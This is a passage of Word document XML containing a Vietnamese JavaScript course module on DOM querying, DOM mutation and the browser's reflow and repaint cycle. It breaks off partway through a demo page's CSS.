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79FD9" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D366A7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Module 4 — JavaScript cho Web (DOM): Lập trình Hướng Sự kiện, Thao tác Cây DOM và Bất đồng bộ Cơ bản</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B1C1C7F" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Giới thiệu Module:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="007E3E15" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t>Nếu HTML kiến tạo khung xương dữ liệu và CSS hoàn thiện diện mạo thị giác, thì JavaScript chính là linh hồn mang lại khả năng tương tác sống động cho ứng dụng web. Trong kiến trúc full-stack hiện đại, việc thấu hiểu tường tận cách JavaScript tương tác với tầng trình duyệt (Browser APIs) là lằn ranh phân định giữa một người chỉ biết dùng framework sao chép mã và một kỹ sư phần mềm thực thụ. Module này đi sâu vào bản chất của Document Object Model (DOM), kiến trúc lập trình hướng sự kiện (Event-driven Architecture), cơ chế bất đồng bộ nền tảng với Fetch API và Promise để kết nối với Backend, cùng các giải pháp lưu trữ trạng thái bền vững tại máy khách (Client-side Storage).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06206E8B" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D366A7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Bài 1: DOM Selection &amp; Manipulation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="253D85D8" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1. Khái niệm cốt lõi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4444690C" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D366A7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Cây DOM (Document Object Model) &amp; Sự khác biệt giữa Node và Element:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F7EC70B" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t>Cây DOM là một giao diện lập trình hướng đối tượng (API) đại diện cho tài liệu HTML dưới dạng một cấu trúc cây phân cấp (tree structure). Trong cấu trúc này, mọi thực thể đều là một Node. Tuy nhiên, kỹ sư cần phân biệt rạch ròi giữa Node và Element:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DA6AC58" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D366A7">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Node:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve"> Là giao diện cơ sở tổng quát nhất. Một Node có thể là một ElementNode (thẻ HTML như &lt;div&gt;, &lt;p&gt;), một TextNode (chữ cái, khoảng trắng, dấu xuống dòng), hoặc một CommentNode (lời bình chú trong mã).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E2E5A0D" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D366A7">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Element:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve"> Là một lớp con kế thừa từ Node (Element extends Node), đại diện cụ thể cho một thẻ HTML thực thụ. Khi lập trình giao diện, chúng ta hầu như luôn thao tác trên Element để kiểm soát các thuộc tính như id, className, children, và style.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63417365" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D366A7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Các API truy vấn DOM (DOM Querying APIs): Cũ vs. Hiện đại:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60F4DF41" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D366A7">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Phương thức cũ:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve"> document.getElementById('id'), document.getElementsByClassName('class'), document.getElementsByTagName('tag'). Điểm cốt tử: các phương thức này trả về một </w:t>
      </w:r>
      <w:r w:rsidRPr="00D366A7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Live HTMLCollection</w:t>
      </w:r>
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve"> — một tập hợp tự động phản ánh những thay đổi tức thời của cây DOM trong thời gian thực, nhưng lại không hỗ trợ các phương thức mảng tiện lợi như .forEach(), .map().</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D259A3B" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D366A7">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Phương thức hiện đại (W3C Selectors API):</w:t>
      </w:r>
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve"> document.querySelector('selector') (trả về phần tử đầu tiên khớp) và document.querySelectorAll('selector') (trả về tất cả phần tử khớp). Các phương thức này sử dụng cú pháp bộ chọn CSS cực kỳ linh hoạt (ví dụ: .card &gt; .btn:first-child) và trả về một </w:t>
      </w:r>
      <w:r w:rsidRPr="00D366A7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Static NodeList</w:t>
      </w:r>
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve"> — một ảnh chụp nhanh tĩnh (snapshot) không bị biến đổi khi cây DOM thay đổi sau đó, hỗ trợ sẵn phương thức .forEach().</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="169A8634" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D366A7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Thao tác Đột biến DOM (DOM Mutation):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="411B3848" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t>Bao gồm các phương thức can thiệp cấu trúc: document.createElement('tag') để khởi tạo phần tử trong bộ nhớ RAM, parent.append(child) và parent.prepend(child) để gắn vào DOM, element.remove() để hủy bỏ phần tử, cùng các phương thức kiểm soát lớp giao diện: element.classList.add(), .remove(), .toggle(). Cần đặc biệt chú ý sự khác biệt giữa ba thuộc tính chỉnh sửa nội dung:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C4AEF42" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D366A7">
        <w:t>textContent: Trả về hoặc gán toàn bộ văn bản thuần túy, an toàn tuyệt đối trước các cuộc tấn công bảo mật.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71C98D4B" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D366A7">
        <w:t>innerText: Trả về văn bản hiển thị nhận biết được qua mắt (tôn trọng CSS display: none và kích hoạt tính toán giao diện - reflow).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C3E59AD" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D366A7">
        <w:t>innerHTML: Phân tích cú pháp chuỗi truyền vào thành các thẻ HTML thực thụ (tiềm ẩn nguy cơ nghiêm trọng nếu không kiểm duyệt).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F031D2F" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2. Cơ chế hoạt động chi tiết</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15837E07" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t>Quy trình JavaScript thực thi thao tác DOM và kích hoạt chu trình Render của trình duyệt:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70867FDF" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D366A7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Memory Allocation (Cấp phát bộ nhớ Node):</w:t>
      </w:r>
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve"> Khi gọi document.createElement('div'), JavaScript Engine (V8) khởi tạo một đối tượng C++ đại diện cho phần tử đó trong bộ nhớ Heap. Lúc này phần tử hoàn toàn độc lập, chưa nằm trên Render Tree.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72E48A17" w14:textId="25FF9899" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D366A7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Attribute &amp; Content Attachment (Gán thuộc tính):</w:t>
      </w:r>
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve"> Thiết lập className, textContent, hoặc các thuộc tính dữ liệu dataset. Thao tác này thuần túy biến đổi đối tượng trong bộ nhớ nên diễn ra cực nhanh (</w:t>
      </w:r>
      <m:oMath>
        <m:r>
          <w:rPr>
            <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
          </w:rPr>
          <m:t>&lt;1</m:t>
        </m:r>
        <m:r>
          <m:rPr>
            <m:nor/>
          </m:rPr>
          <m:t>ms</m:t>
        </m:r>
      </m:oMath>
      <w:r w:rsidRPr="00D366A7">
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44928CC4" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D366A7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Live DOM Insertion (Gắn vào Live DOM):</w:t>
      </w:r>
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve"> Khi thực thi document.body.appendChild(newElement), con trỏ của node mới được nối vào danh sách liên kết con của body.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="452F1125" w14:textId="00286B50" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D366A7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Layout Invalidation &amp; Reflow (Kích hoạt tính toán lại hình học):</w:t>
      </w:r>
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve"> Sự xuất hiện của phần tử mới làm mất hiệu lực cấu trúc hình học hiện tại. Layout Engine buộc phải quét lại cây DOM để tính toán lại tọa độ </w:t>
      </w:r>
      <m:oMath>
        <m:r>
          <w:rPr>
            <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
          </w:rPr>
          <m:t>X,Y</m:t>
        </m:r>
      </m:oMath>
      <w:r w:rsidRPr="00D366A7">
        <w:t>, chiều rộng, chiều cao của phần tử mới và các phần tử bị đẩy dồn xung quanh.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39B19F65" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D366A7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Repaint &amp; Compositing (Vẽ lại và ghép lớp):</w:t>
      </w:r>
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve"> Trình duyệt chuyển các thông số hình học mới tới GPU để vẽ lại các pixel và hòa trộn lên màn hình hiển thị.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E3CAF32" w14:textId="48996840" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D366A7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Kỹ thuật tối ưu hóa DocumentFragment:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve"> Thay vì chèn </w:t>
      </w:r>
      <m:oMath>
        <m:r>
          <w:rPr>
            <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
          </w:rPr>
          <m:t>100</m:t>
        </m:r>
      </m:oMath>
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve"> phần tử con riêng lẻ bằng vòng lặp (gây ra </w:t>
      </w:r>
      <m:oMath>
        <m:r>
          <w:rPr>
            <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
          </w:rPr>
          <m:t>100</m:t>
        </m:r>
      </m:oMath>
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve"> lần Reflow liên tiếp làm đơ ứng dụng), kỹ sư chèn toàn bộ </w:t>
      </w:r>
      <m:oMath>
        <m:r>
          <w:rPr>
            <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
          </w:rPr>
          <m:t>100</m:t>
        </m:r>
      </m:oMath>
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve"> phần tử đó vào một chiếc hộp ảo document.createDocumentFragment(). Khi gắn DocumentFragment vào DOM thật, trình duyệt chỉ kích hoạt Reflow duy nhất một lần.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2919F246" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t>Plaintext</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63702A7D" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t>[ JavaScript Memory (Heap) ] ── (createElement) ──► [ Detached Node ]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="611AED0D" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">                                                            │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6104FE49" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">                                                     (Gán text, class)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="179C2C4F" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">                                                            │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D5C9ADB" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">                                                            ▼</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44AD9A53" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t>[ Live DOM Tree ] ◄── (appendChild / insertBefore) ─────────┘</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53064907" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">        │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="332C7A72" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">        ▼ (Kích hoạt vô hiệu hóa layout)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C622647" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t>[ Reflow / Layout Engine ] (Tính toán lại tọa độ x, y, width, height)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C635AD7" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">        │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AA0DD45" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">        ▼</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="485580F3" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t>[ Repaint Engine ] (Vẽ lại pixel màu sắc lên layers)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1340BECD" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">        │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35E46DC1" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">        ▼</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17535032" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t>[ GPU Compositor ] ──► Hiển thị thay đổi lên Màn hình</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="723841C9" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3. Ví dụ code / demo thực tế</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7340C1FD" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t>HTML</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="165EFE6C" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t>&lt;!DOCTYPE html&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55534448" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t>&lt;html lang="vi"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="766F7032" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t>&lt;head&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C30198A" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">  &lt;meta charset="UTF-8"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C5081D9" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">  &lt;title&gt;Thao Tác Cây DOM Hiệu Năng Cao&lt;/title&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47923CF2" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">  &lt;style&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5038E4F5" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">    .task-item {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31B46B10" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">      display: flex;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="717C1967" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">      justify-content: space-between;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40E78765" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">      align-items: center;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D41F4A7" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">      padding: 8px 12px;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36535EAB" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">      margin-bottom: 8px;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3763A235" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">      background: #f1f5f9;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0452AE2A" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">      border-radius: 4px;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72F02BBD" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">      border-left: 4px solid #3b82f6;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02CAF17E" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E9F1DC1" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">    .task-item.completed {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79454AAE" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">      text-decoration: line-through;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="724EF6AF" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">      opacity: 0.6;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A5A92FB" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">      border-left-color: #10b981;</w:t>
      </w:r>
    </w:p>
